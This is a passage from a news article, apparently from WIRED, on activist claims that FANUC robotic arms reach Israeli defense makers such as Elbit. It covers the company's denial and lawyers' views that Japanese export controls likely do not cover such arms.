FANUC has denied this charge. “When we sell products to Israel, we carry out the necessary transaction screening in accordance with Japan's Foreign Exchange and Foreign Trade Act, confirm the user's business activities and intended use, and do not sell to Israel if the products are for military use,” the company wrote to HuffPost.

The company added that, after reviewing their records of the past five years, “we have not sold any products for military use to the Israeli companies Elbit Systems, IAI, BSEL, Rosenshine Plast, or AMI from our company or our European subsidiary. We have also not sold any products for military use to other Israeli companies from our company or our European subsidiary.” The company identified one instance where one of their robotic arms had been sold to an Israeli company that produces military hardware “after confirming that the machine was to be used for civilian medical purposes.”

At the same time, the company admitted that when they sell through intermediaries, of which Israel has several, they are not always able to guarantee “who the final customer is.”

There is, however, ample evidence that suggests FANUC arms have made their way into the Israel defense manufacturing sector. Multiple job listings posted by Elbit Systems, the primary domestic supplier of the Israel Defense Forces, list “knowledge of FANUC … controls” as either an advantage to job applicants or a requirement. One such job listing, from June, comes from Elbit Cyclone, the division that won a contract to produce fuselage components for the F-35 fighter jet. In January, Israel's Ministry of Defense published a video showing a FANUC robotic arm at an Elbit factory, handling munitions.

Another Israeli company, Bet Shemesh Engines (BSEL), more than a decade ago created marketing videos and uploaded photos to their company website featuring the FANUC robotic arms. The CV of a former employee suggests the company used FANUC robotics to assemble aircraft engines, which may be used for civilian rather than military purposes. Bet Shemesh counts the Israeli Air Force as a major client.

These Israeli companies did not return requests for comment.

Kevin Wolf, an international trade lawyer and partner at Akin Gump Strauss Hauer & Feld, says the activists’ allegations against FANUC may not be quite so clear-cut. Wolf points to Japan’s Foreign Exchange and Foreign Trade Act, which includes a schedule of what items are controlled as dual-use technology. “If it’s on the list, it is. If it isn’t? It isn’t,” he tells WIRED.

While some categories of robotics are included in Japan’s control list—including underwater robots and those used for materials processing—there is no general category for robotic arms or numerical control devices.

Wolf says it is unlikely that Japanese export controls would cover any hypothetical FANUC exports to Elbit, even if made directly and knowingly. Another lawyer familiar with Japanese export controls offered a similar analysis.

Even if it is not a violation of Japanese law, the protesters say FANUC is also violating their own policies. The company adopted a human rights policy in 2019 that reads, in part: “When it is clear that our business has caused or engaged in negative human rights impacts, we will endeavor to remedy them.”

As Israel’s bloody war in Gaza continues, and as it risks a broader regional escalation, these kinds of pressures on companies directly or indirectly aiding Israel’s efforts are certain to continue—even if export controls do not, technically, forbid it.

Tag

#web